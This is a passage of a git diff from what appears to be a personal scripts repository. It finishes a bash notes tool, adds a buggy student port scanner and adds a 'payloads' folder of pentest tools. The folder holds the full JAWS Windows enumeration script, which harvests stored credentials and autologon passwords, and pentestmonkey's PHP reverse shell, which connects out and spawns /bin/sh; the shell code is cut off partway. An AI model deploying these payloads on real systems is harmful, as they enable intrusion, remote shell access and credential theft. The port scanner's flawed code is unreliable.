grep -i --color=always "$query" "$NOTES_FILE" -B 2 -A 2 || echo "No matches found"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# List recent notes
|
||||||
|
list_recent() {
|
||||||
|
if [[ ! -f "$NOTES_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}No notes file found${NC}" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Recent Notes (last 10):${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
# Extract last 10 note entries (sections starting with ##)
|
||||||
|
awk '
|
||||||
|
/^## / {
|
||||||
|
if (count > 0 && count <= 10) {
|
||||||
|
print section
|
||||||
|
}
|
||||||
|
section = $0 "\n"
|
||||||
|
count++
|
||||||
|
next
|
||||||
|
}
|
||||||
|
count > 0 && count <= 10 {
|
||||||
|
section = section $0 "\n"
|
||||||
|
}
|
||||||
|
END {
|
||||||
|
if (count > 0 && count <= 10) {
|
||||||
|
print section
|
||||||
|
}
|
||||||
|
}
|
||||||
|
' "$NOTES_FILE" | tail -n +2
|
||||||
|
}
|
||||||
|
|
||||||
|
# Edit notes
|
||||||
|
edit_notes() {
|
||||||
|
if [[ ! -f "$NOTES_FILE" ]]; then
|
||||||
|
echo "# Notes" > "$NOTES_FILE"
|
||||||
|
echo >> "$NOTES_FILE"
|
||||||
|
fi
|
||||||
|
|
||||||
|
${EDITOR:-vim} "$NOTES_FILE"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Show path
|
||||||
|
show_path() {
|
||||||
|
echo "$NOTES_FILE"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
case $1 in
|
||||||
|
-h|--help)
|
||||||
|
show_help
|
||||||
|
;;
|
||||||
|
-t|--tag)
|
||||||
|
if [[ $# -lt 3 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Tag and note text required" >&2
|
||||||
|
echo "Usage: note -t <tag> <text>" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
tag="$2"
|
||||||
|
shift 2
|
||||||
|
text="$*"
|
||||||
|
add_note "$text" "$tag"
|
||||||
|
;;
|
||||||
|
-s|--search)
|
||||||
|
if [[ $# -lt 2 ]]; then
|
||||||
|
echo -e "${RED}Error:${NC} Search query required" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
shift
|
||||||
|
search_notes "$*"
|
||||||
|
;;
|
||||||
|
-l|--list)
|
||||||
|
list_recent
|
||||||
|
;;
|
||||||
|
-e|--edit)
|
||||||
|
edit_notes
|
||||||
|
;;
|
||||||
|
-p|--path)
|
||||||
|
show_path
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
# Default: add note with "general" tag
|
||||||
|
add_note "$*"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
109
scripts/old-port-scanner.py
Executable file
109
scripts/old-port-scanner.py
Executable file
|
|
@ -0,0 +1,109 @@
|
||||||
|
#!/usr/bin/python3
|
||||||
|
|
||||||
|
# Information Security
|
||||||
|
# Certification Project #3
|
||||||
|
|
||||||
|
import socket
|
||||||
|
import common_ports
|
||||||
|
import re
|
||||||
|
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
|
||||||
|
# Testing
|
||||||
|
# target = "www.freecodecamp.org"
|
||||||
|
# target = socket.gethostbyname("www.freecodecamp.org")
|
||||||
|
# target = "hi"
|
||||||
|
# port_range = [75,85]
|
||||||
|
|
||||||
|
# Testing Function
|
||||||
|
# get_open_ports(target, port_range)
|
||||||
|
|
||||||
|
|
||||||
|
def get_open_ports(target, port_range, verbose=None):
|
||||||
|
# Test if target is URL or IP address, if invalid give correct error message
|
||||||
|
|
||||||
|
target_ip = None
|
||||||
|
target_url = None
|
||||||
|
try:
|
||||||
|
ip_addr = socket.gethostbyname(target)
|
||||||
|
except:
|
||||||
|
if re.search('^[0-9]+', target):
|
||||||
|
print('Target:', target, 'is an ip address')
|
||||||
|
target_ip = True
|
||||||
|
print('Error: Invalid IP address')
|
||||||
|
exit()
|
||||||
|
elif re.search('^[A-Za-z]+', target):
|
||||||
|
print('Target:', target, 'is a url')
|
||||||
|
target_url = True
|
||||||
|
print('Error: Invalid hostname')
|
||||||
|
exit()
|
||||||
|
print('Error: Invalid hostname or IP address')
|
||||||
|
exit()
|
||||||
|
|
||||||
|
# Creates list of ports from starting and ending ports given
|
||||||
|
ports_list = list()
|
||||||
|
for port in port_range:
|
||||||
|
while port <= port_range[1]:
|
||||||
|
ports_list.append(port)
|
||||||
|
port += 1
|
||||||
|
|
||||||
|
# Connects (if url/ip is valid) and checks for open ports
|
||||||
|
open_ports = []
|
||||||
|
# for each port in list, connect
|
||||||
|
for port in ports_list:
|
||||||
|
print('Checking port:', port, 'for target:', target)
|
||||||
|
# if port is open, add to open_ports
|
||||||
|
try:
|
||||||
|
s.connect_ex((target, port)) # == 0
|
||||||
|
s.settimeout(5)
|
||||||
|
open_ports.append[port]
|
||||||
|
print('Port', port, 'is open')
|
||||||
|
print('Open ports:', open_ports)
|
||||||
|
|
||||||
|
# if it can't connect, display correct output
|
||||||
|
except socket.error or socket.gaierror or socket.getaddrinfo:
|
||||||
|
if target_ip:
|
||||||
|
print('Error: Invalid IP address')
|
||||||
|
exit()
|
||||||
|
elif target_url:
|
||||||
|
print('Error: Invalid hostname')
|
||||||
|
exit()
|
||||||
|
except:
|
||||||
|
print('Port', port, 'is closed')
|
||||||
|
continue
|
||||||
|
print('\n* Finished scanning target *')
|
||||||
|
if not open_ports:
|
||||||
|
print('No open ports found on target', target)
|
||||||
|
else:
|
||||||
|
print('Open ports found:', open_ports, 'on', target)
|
||||||
|
|
||||||
|
# Output
|
||||||
|
print(f'\n* Scanning Target: {target} ({ip_addr}) *')
|
||||||
|
print('- Scanning ports:', port_range[0], 'to', port_range[-1])
|
||||||
|
|
||||||
|
# Verbose Output
|
||||||
|
# ports = tuple()
|
||||||
|
# service = dict()
|
||||||
|
serv_d = common_ports.ports_and_services
|
||||||
|
# for each port in open_ports
|
||||||
|
svcs_dict = {port: serv_d[port] for port in open_ports}
|
||||||
|
# svcs_list = [ v for k,v in svcs_dict.items() ]
|
||||||
|
|
||||||
|
if verbose:
|
||||||
|
print(f'\nOpen ports for {target} ({ip_addr})')
|
||||||
|
print('PORT SERVICE')
|
||||||
|
# for port in open_ports:
|
||||||
|
# print(f'{port} {common_ports.ports_and_services[port]}')
|
||||||
|
# print(f'{port} {common_ports.ports_and_services(port)}')
|
||||||
|
# for opts in service:
|
||||||
|
for port, service in svcs_dict.items():
|
||||||
|
print(str(port) + ' ' + str(service))
|
||||||
|
# return print('{} {}'.format(port, service))
|
||||||
|
return
|
||||||
|
|
||||||
|
elif not verbose:
|
||||||
|
print('Open Ports:', open_ports)
|
||||||
|
s.close()
|
||||||
|
return
|
||||||
|
return (open_ports)
|
||||||
|
# return(target, port_range)
|
||||||
1352
scripts/payloads/LinEnum.sh
Normal file
1352
scripts/payloads/LinEnum.sh
Normal file
File diff suppressed because it is too large
Load diff
20914
scripts/payloads/PowerView.ps1
Normal file
20914
scripts/payloads/PowerView.ps1
Normal file
File diff suppressed because it is too large
Load diff
280
scripts/payloads/jaws-enum.ps1
Normal file
280
scripts/payloads/jaws-enum.ps1
Normal file
|
|
@ -0,0 +1,280 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Windows enumeration script
|
||||||
|
.DESCRIPTION
|
||||||
|
This script is designed to be used in a penetration test or CTF
|
||||||
|
enviroment. It will enumerate useful information from the host
|
||||||
|
for privilege escalation.
|
||||||
|
.EXAMPLE
|
||||||
|
PS > .\jaws-enum.ps1
|
||||||
|
will write results out to screen.
|
||||||
|
.EXAMPLE
|
||||||
|
PS > .\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt
|
||||||
|
Writes out results to Jaws-Enum.txt in current directory.
|
||||||
|
.LINK
|
||||||
|
https://github.com/411Hall/JAWS
|
||||||
|
#>
|
||||||
|
Param(
|
||||||
|
[String]$OutputFilename = ""
|
||||||
|
)
|
||||||
|
|
||||||
|
function JAWS-ENUM {
|
||||||
|
write-output "`nRunning J.A.W.S. Enumeration"
|
||||||
|
$output = ""
|
||||||
|
$output = $output + "############################################################`r`n"
|
||||||
|
$output = $output + "## J.A.W.S. (Just Another Windows Enum Script) ##`r`n"
|
||||||
|
$output = $output + "## ##`r`n"
|
||||||
|
$output = $output + "## https://github.com/411Hall/JAWS ##`r`n"
|
||||||
|
$output = $output + "## ##`r`n"
|
||||||
|
$output = $output + "############################################################`r`n"
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$win_version = (Get-WmiObject -class Win32_OperatingSystem)
|
||||||
|
$output = $output + "Windows Version: " + (($win_version.caption -join $win_version.version) + "`r`n")
|
||||||
|
$output = $output + "Architecture: " + (($env:processor_architecture) + "`r`n")
|
||||||
|
$output = $output + "Hostname: " + (($env:ComputerName) + "`r`n")
|
||||||
|
$output = $output + "Current User: " + (($env:username) + "`r`n")
|
||||||
|
$output = $output + "Current Time\Date: " + (get-date)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
write-output " - Gathering User Information"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Users`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
|
||||||
|
$adsi.Children | where {$_.SchemaClassName -eq 'user'} | Foreach-Object {
|
||||||
|
$groups = $_.Groups() | Foreach-Object {$_.GetType().InvokeMember("Name", 'GetProperty', $null, $_, $null)}
|
||||||
|
$output = $output + "----------`r`n"
|
||||||
|
$output = $output + "Username: " + $_.Name + "`r`n"
|
||||||
|
$output = $output + "Groups: " + $groups + "`r`n"
|
||||||
|
}
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Network Information`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (ipconfig | out-string)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Arp`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (arp -a | out-string)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " NetStat`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (netstat -ano | out-string)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Firewall Status`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$Firewall = New-Object -com HNetCfg.FwMgr
|
||||||
|
$FireProfile = $Firewall.LocalPolicy.CurrentProfile
|
||||||
|
if ($FireProfile.FirewallEnabled -eq $False) {
|
||||||
|
$output = $output + ("Firewall is Disabled" + "`r`n")
|
||||||
|
} else {
|
||||||
|
$output = $output + ("Firwall is Enabled" + "`r`n")
|
||||||
|
}
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " FireWall Rules`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
Function Get-FireWallRule
|
||||||
|
{Param ($Name, $Direction, $Enabled, $Protocol, $profile, $action, $grouping)
|
||||||
|
$Rules=(New-object -comObject HNetCfg.FwPolicy2).rules
|
||||||
|
If ($name) {$rules= $rules | where-object {$_.name -like $name}}
|
||||||
|
If ($direction) {$rules= $rules | where-object {$_.direction -eq $direction}}
|
||||||
|
If ($Enabled) {$rules= $rules | where-object {$_.Enabled -eq $Enabled}}
|
||||||
|
If ($protocol) {$rules= $rules | where-object {$_.protocol -eq $protocol}}
|
||||||
|
If ($profile) {$rules= $rules | where-object {$_.Profiles -bAND $profile}}
|
||||||
|
If ($Action) {$rules= $rules | where-object {$_.Action -eq $Action}}
|
||||||
|
If ($Grouping) {$rules= $rules | where-object {$_.Grouping -like $Grouping}}
|
||||||
|
$rules}
|
||||||
|
$output = $output + (Get-firewallRule -enabled $true | sort direction,applicationName,name | format-table -property Name , localPorts,applicationname | out-string)
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Hosts File Content`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + ((get-content $env:windir\System32\drivers\etc\hosts | out-string) + "`r`n")
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
write-output " - Gathering Processes, Services and Scheduled Tasks"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Processes`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + ((Get-WmiObject win32_process | Select-Object Name,ProcessID,@{n='Owner';e={$_.GetOwner().User}},CommandLine | sort name | format-table -wrap -autosize | out-string) + "`r`n")
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Scheduled Tasks`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + "Current System Time: " + (get-date)
|
||||||
|
$output = $output + (schtasks /query /FO CSV /v | convertfrom-csv | where { $_.TaskName -ne "TaskName" } | select "TaskName","Run As User", "Task to Run" | fl | out-string)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Services`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (get-service | Select Name,DisplayName,Status | sort status | Format-Table -Property * -AutoSize | Out-String -Width 4096)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
write-output " - Gathering Installed Software"
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Installed Programs`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (get-wmiobject -Class win32_product | select Name, Version, Caption | ft -hidetableheaders -autosize| out-string -Width 4096)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Installed Patches`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (Get-Wmiobject -class Win32_QuickFixEngineering -namespace "root\cimv2" | select HotFixID, InstalledOn| ft -autosize | out-string )
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Program Folders`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + "`n`rC:\Program Files`r`n"
|
||||||
|
$output = $output + "-------------"
|
||||||
|
$output = $output + (get-childitem "C:\Program Files" -EA SilentlyContinue | select Name | ft -hidetableheaders -autosize| out-string)
|
||||||
|
$output = $output + "C:\Program Files (x86)`r`n"
|
||||||
|
$output = $output + "-------------------"
|
||||||
|
$output = $output + (get-childitem "C:\Program Files (x86)" -EA SilentlyContinue | select Name | ft -hidetableheaders -autosize| out-string)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
write-output " - Gathering File System Information"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Files with Full Control and Modify Access`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$files = get-childitem C:\
|
||||||
|
foreach ($file in $files){
|
||||||
|
try {
|
||||||
|
$output = $output + (get-childitem "C:\$file" -include *.ps1,*.bat,*.com,*.vbs,*.txt,*.html,*.conf,*.rdp,.*inf,*.ini -recurse -EA SilentlyContinue | get-acl -EA SilentlyContinue | select path -expand access |
|
||||||
|
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|EVERYONE|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
|
||||||
|
ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
|
||||||
|
}
|
||||||
|
catch {
|
||||||
|
$output = $output + "`nFailed to read more files`r`n"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Folders with Full Control and Modify Access`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$folders = get-childitem C:\
|
||||||
|
foreach ($folder in $folders){
|
||||||
|
try {
|
||||||
|
$output = $output + (Get-ChildItem -Recurse "C:\$folder" -EA SilentlyContinue | ?{ $_.PSIsContainer} | get-acl | select path -expand access |
|
||||||
|
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
|
||||||
|
select path,filesystemrights,IdentityReference | ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
|
||||||
|
}
|
||||||
|
catch {
|
||||||
|
$output = $output + "`nFailed to read more folders`r`n"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Mapped Drives`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (Get-WmiObject -Class Win32_LogicalDisk | select DeviceID, VolumeName | ft -hidetableheaders -autosize | out-string -Width 4096)
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Unquoted Service Paths`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (cmd /c 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """')
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Recent Documents`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (get-childitem "C:\Users\$env:username\AppData\Roaming\Microsoft\Windows\Recent" -EA SilentlyContinue | select Name | ft -hidetableheaders | out-string )
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Potentially Interesting Files in Users Directory `r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (get-childitem "C:\Users\" -recurse -Include *.zip,*.rar,*.7z,*.gz,*.conf,*.rdp,*.kdbx,*.crt,*.pem,*.ppk,*.txt,*.xml,*.vnc.*.ini,*.vbs,*.bat,*.ps1,*.cmd -EA SilentlyContinue | %{$_.FullName } | out-string)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " 10 Last Modified Files in C:\User`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (Get-ChildItem 'C:\Users' -recurse -EA SilentlyContinue | Sort {$_.LastWriteTime} | %{$_.FullName } | select -last 10 | ft -hidetableheaders | out-string)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " MUICache Files`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
get-childitem "HKCU:\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\" -EA SilentlyContinue |
|
||||||
|
foreach { $CurrentKey = (Get-ItemProperty -Path $_.PsPath)
|
||||||
|
if ($CurrentKey -match "C:\\") {
|
||||||
|
$output = $output + ($_.Property -join "`r`n")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
write-output " - Looking for Simple Priv Esc Methods"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " System Files with Passwords`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$files = ("unattended.xml", "sysprep.xml", "autounattended.xml","unattended.inf", "sysprep.inf", "autounattended.inf","unattended.txt", "sysprep.txt", "autounattended.txt")
|
||||||
|
$output = $output + (get-childitem C:\ -recurse -include $files -EA SilentlyContinue | Select-String -pattern "<Value>" | out-string)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " AlwaysInstalledElevated Registry Key`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$HKLM = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer"
|
||||||
|
$HKCU = "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer"
|
||||||
|
if (($HKLM | test-path) -eq "True")
|
||||||
|
{
|
||||||
|
if (((Get-ItemProperty -Path $HKLM -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
|
||||||
|
{
|
||||||
|
$output = $output + "AlwaysInstallElevated enabled on this host!"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if (($HKCU | test-path) -eq "True")
|
||||||
|
{
|
||||||
|
if (((Get-ItemProperty -Path $HKCU -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
|
||||||
|
{
|
||||||
|
$output = $output + "AlwaysInstallElevated enabled on this host!"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Stored Credentials`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + (cmdkey /list | out-string)
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$output = $output + " Checking for AutoAdminLogon `r`n"
|
||||||
|
$output = $output + "-----------------------------------------------------------`r`n"
|
||||||
|
$Winlogon = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
|
||||||
|
if (get-itemproperty -path $Winlogon -Name AutoAdminLogon -ErrorAction SilentlyContinue)
|
||||||
|
{
|
||||||
|
if ((get-itemproperty -path $Winlogon -Name AutoAdminLogon).AutoAdminLogon -eq 1)
|
||||||
|
{
|
||||||
|
$Username = (get-itemproperty -path $Winlogon -Name DefaultUserName).DefaultUsername
|
||||||
|
$output = $output + "The default username is $Username `r`n"
|
||||||
|
$Password = (get-itemproperty -path $Winlogon -Name DefaultPassword).DefaultPassword
|
||||||
|
$output = $output + "The default password is $Password `r`n"
|
||||||
|
$DefaultDomainName = (get-itemproperty -path $Winlogon -Name DefaultDomainName).DefaultDomainName
|
||||||
|
$output = $output + "The default domainname is $DefaultDomainName `r`n"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$output = $output + "`r`n"
|
||||||
|
if ($OutputFilename.length -gt 0)
|
||||||
|
{
|
||||||
|
$output | Out-File -FilePath $OutputFileName -encoding utf8
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
clear-host
|
||||||
|
write-output $output
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($OutputFilename.length -gt 0)
|
||||||
|
{
|
||||||
|
Try
|
||||||
|
{
|
||||||
|
[io.file]::OpenWrite($OutputFilename).close()
|
||||||
|
JAWS-ENUM
|
||||||
|
}
|
||||||
|
Catch
|
||||||
|
{
|
||||||
|
Write-Warning "`nUnable to write to output file $OutputFilename, Check path and permissions"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
JAWS-ENUM
|
||||||
|
}
|
||||||
8579
scripts/payloads/linpeas.sh
Normal file
8579
scripts/payloads/linpeas.sh
Normal file
File diff suppressed because one or more lines are too long
2696
scripts/payloads/linux-exploit-suggester.sh
Normal file
2696
scripts/payloads/linux-exploit-suggester.sh
Normal file
File diff suppressed because it is too large
Load diff
192
scripts/payloads/php-reverse-shell.php
Normal file
192
scripts/payloads/php-reverse-shell.php
Normal file
|
|
@ -0,0 +1,192 @@
|
||||||
|
<?php
|
||||||
|
// php-reverse-shell - A Reverse Shell implementation in PHP
|
||||||
|
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
|
||||||
|
//
|
||||||
|
// This tool may be used for legal purposes only. Users take full responsibility
|
||||||
|
// for any actions performed using this tool. The author accepts no liability
|
||||||
|
// for damage caused by this tool. If these terms are not acceptable to you, then
|
||||||
|
// do not use this tool.
|
||||||
|
//
|
||||||
|
// In all other respects the GPL version 2 applies:
|
||||||
|
//
|
||||||
|
// This program is free software; you can redistribute it and/or modify
|
||||||
|
// it under the terms of the GNU General Public License version 2 as
|
||||||
|
// published by the Free Software Foundation.
|
||||||
|
//
|
||||||
|
// This program is distributed in the hope that it will be useful,
|
||||||
|
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
// GNU General Public License for more details.
|
||||||
|
//
|
||||||
|
// You should have received a copy of the GNU General Public License along
|
||||||
|
// with this program; if not, write to the Free Software Foundation, Inc.,
|
||||||
|
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||||
|
//
|
||||||
|
// This tool may be used for legal purposes only. Users take full responsibility
|
||||||
|
// for any actions performed using this tool. If these terms are not acceptable to
|
||||||
|
// you, then do not use this tool.
|
||||||
|
//
|
||||||
|
// You are encouraged to send comments, improvements or suggestions to
|
||||||
|
// me at pentestmonkey@pentestmonkey.net
|
||||||
|
//
|
||||||
|
// Description
|
||||||
|
// -----------
|
||||||
|
// This script will make an outbound TCP connection to a hardcoded IP and port.
|
||||||
|
// The recipient will be given a shell running as the current user (apache normally).
|
||||||
|
//
|
||||||
|
// Limitations
|
||||||
|
// -----------
|
||||||
|
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
|
||||||
|
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
|
||||||
|
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
|
||||||
|
//
|
||||||
|
// Usage
|
||||||
|
// -----
|
||||||
|
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
|
||||||
|
|
||||||
|
set_time_limit (0);
|
||||||
|
$VERSION = "1.0";
|
||||||
|
$ip = '127.0.0.1'; // CHANGE THIS
|
||||||
|
$port = 1234; // CHANGE THIS
|
||||||
|
$chunk_size = 1400;
|
||||||
|
$write_a = null;
|
||||||
|
$error_a = null;
|
||||||
|
$shell = 'uname -a; w; id; /bin/sh -i';
|
||||||
|
$daemon = 0;
|
||||||
|
$debug = 0;
|
||||||
|
|
||||||
|
//
|
||||||
|
// Daemonise ourself if possible to avoid zombies later
|
||||||
|
//
|
||||||
|
|
||||||
|
// pcntl_fork is hardly ever available, but will allow us to daemonise
|
||||||
|
// our php process and avoid zombies. Worth a try...
|
||||||
|
if (function_exists('pcntl_fork')) {
|
||||||
|
// Fork and have the parent process exit
|
||||||
|
$pid = pcntl_fork();
|
||||||
|
|
||||||
|
if ($pid == -1) {
|
||||||
|
printit("ERROR: Can't fork");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($pid) {
|
||||||
|
exit(0); // Parent exits
|
||||||
|
}
|
||||||
|
|
||||||
|
// Make the current process a session leader
|
||||||
|
// Will only succeed if we forked
|
||||||
|
if (posix_setsid() == -1) {
|
||||||
|
printit("Error: Can't setsid()");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
$daemon = 1;
|
||||||
|
} else {
|
||||||
|
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||||
|
}
|
||||||
|
|
||||||
|
// Change to a safe directory
|
||||||
|
chdir("/");
|
||||||
|
|
||||||
|
// Remove any umask we inherited
|
||||||
|
umask(0);
|
||||||
|
|
||||||
|
//
|
||||||
|
// Do the reverse shell...
|
||||||
|
//
|
||||||
|
|
||||||
|
// Open reverse connection
|
||||||
|
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
|
||||||
|
if (!$sock) {
|
||||||
|
printit("$errstr ($errno)");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Spawn shell process
|
||||||
|
$descriptorspec = array(
|
||||||
|
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||||
|
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||||
|
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||||
|
);
|
||||||
|
|
||||||
|
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||||
|
|
||||||
|
if (!is_resource($process)) {
|
||||||
|
printit("ERROR: Can't spawn shell");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set everything to non-blocking
|
||||||
|
